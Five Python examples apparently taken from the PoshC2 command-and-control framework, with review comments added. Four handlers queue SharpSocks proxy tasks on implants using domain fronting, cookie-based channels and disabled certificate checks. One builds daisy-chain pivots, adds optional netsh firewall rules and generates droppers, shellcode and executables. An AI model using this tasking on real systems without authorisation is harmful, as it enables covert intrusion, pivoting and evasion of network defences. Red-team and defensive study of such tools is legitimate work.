Ejemplo n.º 1
def do_sharpsocks(user, command, randomuri):
    """Queue a SharpSocks client task for one implant after operator confirmation.

    Generates a random 25-letter channel name and a key from ``gen_key()``,
    prints the matching ``sharpsocks`` server command line for the operator
    and, when the operator answers "y" or just presses Enter, hands the
    client command to ``new_task`` and labels the implant "SharpSocks".

    Args:
        user: Operator name, forwarded to ``check_module_loaded`` and ``new_task``.
        command: Raw console command; not read by this handler.
        randomuri: Identifier of the implant the task is queued for.

    Returns:
        None.
    """
    check_module_loaded("SharpSocks.ps1", randomuri, user)
    import string
    from random import choice

    # Channel name: 25 letters drawn with random.choice.
    letters = string.ascii_letters
    channel = "".join([choice(letters) for _ in range(25)])
    sharpkey = gen_key().decode("utf-8")
    sharpurls = get_sharpurls()
    comms_host = select_item("PayloadCommsHost", "C2Server")
    front_header = select_item("DomainFrontHeader", "C2Server")
    sharpurl = get_first_url(comms_host, front_header)
    dfheader = get_first_dfheader(select_item("DomainFrontHeader", "C2Server"))

    # Implants whose Pivot is not "PS" get a URL typed in by the operator
    # instead of the configured one; the value is used as entered.
    if get_implantdetails(randomuri).Pivot != "PS":
        sharpurl = input("Enter the URL for SharpSocks: ")

    # The key and channel are echoed in clear text on the console here and
    # embedded again in the task string below.
    # NOTE(review): new_task presumably persists the task text, so scrollback
    # and task history would both hold the key - confirm and handle as sensitive.
    server_hint = "sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" % (
        channel, sharpkey, SocksHost)
    print(server_hint + Colours.GREEN)

    ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
    answer = ri.lower()
    if answer == "n":
        print("")
        return
    if answer not in ("", "y"):
        # Anything other than Enter / y / n is silently ignored.
        return

    # NOTE(review): the -Insecure flag name suggests certificate validation is
    # switched off on the client side; confirm in SharpSocks.ps1.
    taskcmd = "Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % (
        sharpurl, channel, sharpkey, sharpurls)
    if dfheader:
        taskcmd = taskcmd + " -DomainFrontURL %s" % dfheader
    new_task(taskcmd, user, randomuri)
    update_label("SharpSocks", randomuri)
Ejemplo n.º 2
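def do_sharpsocks(user, command, randomuri):
    """Print the SharpSocks server command lines and, on confirmation, queue the implant task.

    Generates a random 25-letter channel name and a key from ``gen_key()``,
    prints a Docker and a non-Docker ``sharpsocks`` server command line, then
    asks the operator to confirm. On "y" or Enter the ``run-exe`` task is
    passed to ``new_task``; any other answer aborts without queuing anything
    and says so, instead of reporting a task that was never issued.

    Args:
        user: Operator name, forwarded to ``new_task``.
        command: Raw console command; not read by this handler.
        randomuri: Identifier of the implant the task is queued for.

    Returns:
        None.

    Raises:
        IndexError: If ``SocksHost`` contains fewer than two ":" separators,
            or, once the operator has confirmed, if ``get_sharpurls()``
            yields fewer than two comma-separated entries.
    """
    from random import choice

    allchar = string.ascii_letters
    channel = "".join(choice(allchar) for _ in range(25))
    sharpkey = gen_key().decode("utf-8")
    sharpurls = get_sharpurls().split(",")
    sharpurl = select_item("PayloadCommsHost",
                           "C2Server").replace('"', '').split(',')[0]
    user_agent = select_item("UserAgent", "C2Server")
    dfheader = get_first_dfheader(select_item("DomainFrontHeader", "C2Server"))

    # The key and channel are echoed in clear text on the console and embedded
    # again in the task string below.
    # NOTE(review): new_task presumably persists the task text - confirm and
    # treat console scrollback and task history as sensitive engagement data.
    print(
        "\nIf using Docker, change the SocksHost to be the IP of the PoshC2 Server not 127.0.0.1:49031"
    )
    print(
        "sharpsocks -t latest -s \"-c=%s -k=%s --verbose -l=http://*:%s\"\r" %
        (channel, sharpkey, SocksHost.split(":")[2]) + Colours.GREEN)
    print("\nElse\n")
    print("sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" %
          (channel, sharpkey, SocksHost) + Colours.GREEN)

    ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
    if ri != "" and ri.lower() != "y":
        # Previously the "task issued" line was printed even on this path.
        print("Aborted...")
        return

    url1 = sharpurls[0].replace("\"", "")
    url2 = sharpurls[1].replace("\"", "")
    base = "run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken"
    if dfheader:
        # The Enter and "y" paths have always differed by one space before
        # --user-agent; the emitted task text is kept byte-for-byte.
        gap = " " if ri == "" else "  "
        task = (base + " -df %s" + gap + "--user-agent \"%s\"") % (
            sharpurl, channel, sharpkey, url1, url2, dfheader, user_agent)
    else:
        task = (base + "  --user-agent \"%s\"") % (
            sharpurl, channel, sharpkey, url1, url2, user_agent)

    new_task(task, user, randomuri)
    print("SharpSocks task issued, to stop SharpSocks run stopsocks")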
Ejemplo n.º 3
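def do_sharpsocks(user, command, randomuri):
    """Print the SharpSocks server command line and, on confirmation, queue the implant task.

    Generates a random 25-letter channel name and a key from ``gen_key()``,
    prints the ``sharpsocks`` server command line, then asks the operator to
    confirm. On "y" or Enter a single ``run-exe`` task is passed to
    ``new_task``; any other answer aborts without queuing anything and says
    so, instead of reporting a task that was never issued.

    Args:
        user: Operator name, forwarded to ``new_task``.
        command: Raw console command; not read by this handler.
        randomuri: Identifier of the implant the task is queued for.

    Returns:
        None.

    Raises:
        IndexError: Once the operator has confirmed, if ``get_sharpurls()``
            yields fewer than two comma-separated entries.
    """
    from random import choice

    allchar = string.ascii_letters
    channel = "".join(choice(allchar) for _ in range(25))
    sharpkey = gen_key().decode("utf-8")
    sharpurls = get_sharpurls().split(",")
    sharpurl = get_first_url(select_item("PayloadCommsHost", "C2Server"),
                             select_item("DomainFrontHeader", "C2Server"))
    dfheader = get_first_dfheader(select_item("DomainFrontHeader", "C2Server"))

    # The key and channel are echoed in clear text on the console and embedded
    # again in the task string below.
    # NOTE(review): new_task presumably persists the task text - confirm and
    # treat console scrollback and task history as sensitive engagement data.
    print("sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" %
          (channel, sharpkey, SocksHost) + Colours.GREEN)

    ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
    if ri != "" and ri.lower() != "y":
        # Previously the "task issued" line was printed even on this path.
        print("Aborted...")
        return

    # The Enter and "y" branches built identical strings, so one copy suffices.
    task = "run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken" % (
        sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""),
        sharpurls[1].replace("\"", ""))
    if dfheader:
        task += " -df %s" % (dfheader,)

    new_task(task, user, randomuri)
    print("SharpSocks task issued, to stop SharpSocks run stopsocks")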
Ejemplo n.º 4
def do_startdaisy(user, command, randomuri):
    """Interactively build and queue an ``invoke-daisychain`` task for one implant.

    Prompts the operator for the bind address and port, the upstream URL or
    upstream daisy host, and optional domain-front header and proxy settings.
    The answers are assembled into an ``invoke-daisychain`` command line,
    queued with ``new_task``, and the implant is labelled "DaisyHost".
    Optionally creates a payload set, named by the operator, that points at
    the new daisy listener.

    Args:
        user: Operator name, forwarded to ``check_module_loaded`` and ``new_task``.
        command: Incoming console command; its value is not read and the name
            is reused below for the task string.
        randomuri: Identifier of the implant that will host the daisy server.

    Returns:
        None. Returns early, without queuing anything, if the operator
        declines the localhost-only warning.
    """
    check_module_loaded("invoke-daisychain.ps1", randomuri, user)

    elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)

    # Optional settings default to empty strings so the later truthiness
    # checks skip them when they were never asked for.
    domain_front = ""
    proxy_user = ""
    proxy_pass = ""
    proxy_url = ""
    cred_expiry = ""

    # Any answer other than "n" takes the else branch and is asked for a bind IP.
    # NOTE(review): the firewall step further down treats only "y"/Enter as
    # elevated, so other answers get a custom bind IP plus -localhost - confirm intended.
    if elevated.lower() == "n":
        cont = input(
            Colours.RED +
            "Daisy from an unelevated context can only bind to localhost, continue? y/N "
            + Colours.END)
        # Default (Enter) is "no": nothing has been queued at this point.
        if cont.lower() == "n" or cont == "":
            return

        bind_ip = "localhost"

    else:
        bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " +
                        Colours.END)

    bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " +
                      Colours.END)
    firstdaisy = input(Colours.GREEN +
                       "Is this the first daisy in the chain? Y/n? " +
                       Colours.END)
    default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
    default_df_header = get_first_dfheader(DomainFrontHeader)
    # A header equal to the first URL is dropped, so no default header is offered.
    if default_df_header == default_url:
        default_df_header = None
    if firstdaisy.lower() == "y" or firstdaisy == "":
        # First hop: upstream URL, front header and proxy details are all asked for.
        upstream_url = input(Colours.GREEN +
                             f"C2 URL (leave blank for {default_url}): " +
                             Colours.END)
        domain_front = input(
            Colours.GREEN +
            f"Domain front header (leave blank for {str(default_df_header)}): "
            + Colours.END)
        proxy_user = input(
            Colours.GREEN +
            "Proxy user (<domain>\\<username>, leave blank if none): " +
            Colours.END)
        # input() echoes what is typed, so the password is visible on the console.
        proxy_pass = input(Colours.GREEN +
                           "Proxy password (leave blank if none): " +
                           Colours.END)
        proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " +
                          Colours.END)
        # Unlike the prompts above, Colours.END is not appended to this one.
        cred_expiry = input(
            Colours.GREEN +
            "Password/Account Expiration Date: .e.g. 15/03/2018: ")

        # Blank answers fall back to the defaults computed above.
        if not upstream_url:
            upstream_url = default_url
        if not domain_front:
            if default_df_header:
                domain_front = default_df_header
            else:
                domain_front = ""

    else:
        # Later hop: the upstream is another daisy server, addressed over plain http.
        upstream_daisy_host = input(Colours.GREEN +
                                    "Upstream daisy server:  " + Colours.END)
        upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port:  " +
                                    Colours.END)
        upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"

    # Operator answers are interpolated exactly as typed; no validation or
    # escaping is applied to any of them.
    command = f"invoke-daisychain -daisyserver http://{bind_ip} -port {bind_port} -c2server {upstream_url}"

    # Proxy URL, user and password are wrapped in single quotes and embedded in
    # clear text in the task string.
    # NOTE(review): new_task presumably stores the task text, so the project
    # data would then contain these credentials - confirm and handle accordingly.
    if domain_front:
        command = command + f" -domfront {domain_front}"
    if proxy_url:
        command = command + f" -proxyurl '{proxy_url}'"
    if proxy_user:
        command = command + f" -proxyuser '{proxy_user}'"
    if proxy_pass:
        command = command + f" -proxypassword '{proxy_pass}'"

    if elevated.lower() == "y" or elevated == "":

        firewall = input(Colours.GREEN +
                         "Add firewall rule? (uses netsh.exe) y/N: ")
        # Default (Enter or "n") appends -nofwrule; any other answer leaves it off.
        if firewall.lower() == "n" or firewall == "":
            command = command + " -nofwrule"

    else:
        print_good(
            "Not elevated so binding to localhost and not adding firewall rule"
        )
        command = command + " -localhost"

    # The value returned by get_allurls() is appended as one quoted argument.
    urls = get_allurls()
    command = command + f" -urls '{urls}'"
    new_task(command, user, randomuri)
    update_label("DaisyHost", randomuri)

    createpayloads = input(
        Colours.GREEN +
        "Would you like to create payloads for this Daisy Server? Y/n ")

    if createpayloads.lower() == "y" or createpayloads == "":

        name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)

        daisyhost = get_implantdetails(randomuri)
        # PowerShell snippet that assigns an empty web proxy when $proxyurl is unset.
        proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
        C2 = get_c2server_all()
        # The new URL record points at the daisy listener and carries the proxy
        # URL, user, password and expiry entered above.
        # NOTE(review): presumably persisted by new_urldetails - confirm, since
        # that would place the proxy credentials in the project store.
        urlId = new_urldetails(name, f"\"http://{bind_ip}:{bind_port}\"",
                               "\"\"", proxy_url, proxy_user, proxy_pass,
                               cred_expiry)
        newPayload = Payloads(C2.KillDate,
                              C2.EncKey,
                              C2.Insecure,
                              C2.UserAgent,
                              C2.Referrer,
                              "%s?d" % get_newimplanturl(),
                              PayloadsDirectory,
                              URLID=urlId,
                              PowerShellProxyCommand=proxynone)
        # Swap the "$pid;<upstream_url>" marker in the PowerShell dropper for
        # "$pid;<User>@<Domain>" taken from the daisy host's implant record.
        newPayload.PSDropper = (newPayload.PSDropper).replace(
            "$pid;%s" % (upstream_url),
            "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
        # Each Create* call is given the operator-chosen payload name.
        newPayload.CreateDroppers(name)
        newPayload.CreateRaw(name)
        newPayload.CreateDlls(name)
        newPayload.CreateShellcode(name)
        newPayload.CreateEXE(name)
        newPayload.CreateMsbuild(name)
        print_good("Created new %s daisy payloads" % name)
Ejemplo n.º 5
def do_sharpsocks(user, command, randomuri):
    """Prompt for SharpSocks settings, print the server command and queue the implant task.

    Asks the operator, with history-backed prompts, for the proxy URIs, the
    base URL, the host header, the user agent and the beacon interval. Blank
    answers fall back to the configured defaults. The server command line is
    printed for the operator to run, and after confirmation the ``run-exe``
    task is passed to ``new_task``.

    Args:
        user: Operator name, forwarded to ``new_task``.
        command: Raw console command; scanned for ``-v``/``--verbose`` and,
            with the leading "sharpsocks " removed, appended to the task.
        randomuri: Identifier of the implant the task is queued for.

    Returns:
        None. Returns early if fewer than two URIs are given, if the URL does
        not start with "http", or if the operator does not confirm.
    """
    style = Style.from_dict({
        '': '#80d130',
    })

    from random import choice

    def _history_session(history_file):
        # One session per question. FileHistory writes every answer to a
        # dotfile under the project directory, so earlier domains, host
        # headers and user agents remain on disk there.
        return PromptSession(
            history=FileHistory(f'{PoshProjectDirectory}/{history_file}'),
            auto_suggest=AutoSuggestFromHistory(),
            style=style)

    channel = "".join([choice(string.ascii_letters) for _ in range(25)])
    sharp_key = gen_key().decode("utf-8")

    # --- proxy URIs: at least two, quotes and one leading slash removed ---
    default_sharp_urls = get_sharpurls()
    typed_urls = _history_session(".comma-separated-urls-history").prompt(
        f"What URIs would you like to use for SharpSocks? Default is {default_sharp_urls.replace(' ', '')}: "
    )
    uri_parts = (typed_urls or default_sharp_urls).split(",")
    if len(uri_parts) < 2:
        print("Please specify at least two URIs")
        return
    socks_proxy_urls = []
    for part in uri_parts:
        uri = part.replace("\"", "").strip()
        if uri.startswith("/"):
            uri = uri[1:]
        socks_proxy_urls.append(uri)

    # --- base URL: must carry a scheme ---
    default_sharp_url = select_item("PayloadCommsHost",
                                    "C2Server").replace('"', '').split(',')[0]
    sharp_url = _history_session(".protocol-and-domain-history").prompt(
        f"What domain would you like to use for SharpSocks? Default is {default_sharp_url}: "
    ) or default_sharp_url
    if not sharp_url.startswith("http"):
        print("Please specify a protocol (http/https)")
        return

    # --- host header ---
    default_host_header = get_first_dfheader(
        select_item("DomainFrontHeader", "C2Server"))
    host_header = _history_session(".host-headers-history").prompt(
        f"What host header should used? Default is {default_host_header}: "
    ) or default_host_header

    # --- user agent ---
    default_user_agent = select_item("UserAgent", "C2Server")
    user_agent = _history_session(".user-agents-history").prompt(
        f"What user agent? Default is \"{default_user_agent}\": "
    ) or default_user_agent

    # --- beacon interval in milliseconds, a trailing "ms" is tolerated ---
    default_beacon = "200"
    beacon = _history_session(".beacon-history").prompt(
        f"What beacon interval would you like SharpSocks to use (ms)? Default: {default_beacon}ms: "
    ) or default_beacon
    if beacon.strip().endswith("ms"):
        beacon = beacon.replace("ms", "").strip()

    # The key and channel are printed in clear text here and embedded again in
    # the task string below.
    # NOTE(review): new_task presumably persists the task text - confirm and
    # treat console scrollback and task history as sensitive engagement data.
    server_command = f"{PoshInstallDirectory}resources/SharpSocks/SharpSocksServer/SharpSocksServer -c={channel} -k={sharp_key} -l={SocksHost} -v"
    if any(flag in command for flag in (" -v", " --verbose")):
        server_command += " --verbose"
    server_command += "\n"
    print(
        Colours.GREEN +
        "\nOk, run this command from your SharpSocksServer directory to launch the SharpSocks server:\n"
    )
    print(server_command)

    url1, url2 = socks_proxy_urls[0], socks_proxy_urls[1]
    task = (
        f"run-exe SharpSocksImplant.Program SharpSocksImplant -s {sharp_url} -c {channel} -k {sharp_key}"
        f" -url1 {url1} -url2 {url2} -b {beacon} -r {beacon}"
        " --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken"
        f" --user-agent \"{user_agent}\""
    )
    if host_header:
        task += f" -df {host_header}"

    # Whatever follows "sharpsocks " on the console line is appended unchanged;
    # no validation is applied to it.
    extra_args = command.replace("sharpsocks ", "").strip()
    if extra_args:
        task += " " + extra_args

    confirm = input(
        "Are you ready to start the SharpSocks in the implant? (Y/n) ")
    if confirm != "" and confirm.lower() != "y":
        print("Aborted...")
        return

    new_task(task, user, randomuri)
    print("SharpSocks task issued, to stop SharpSocks run stopsocks")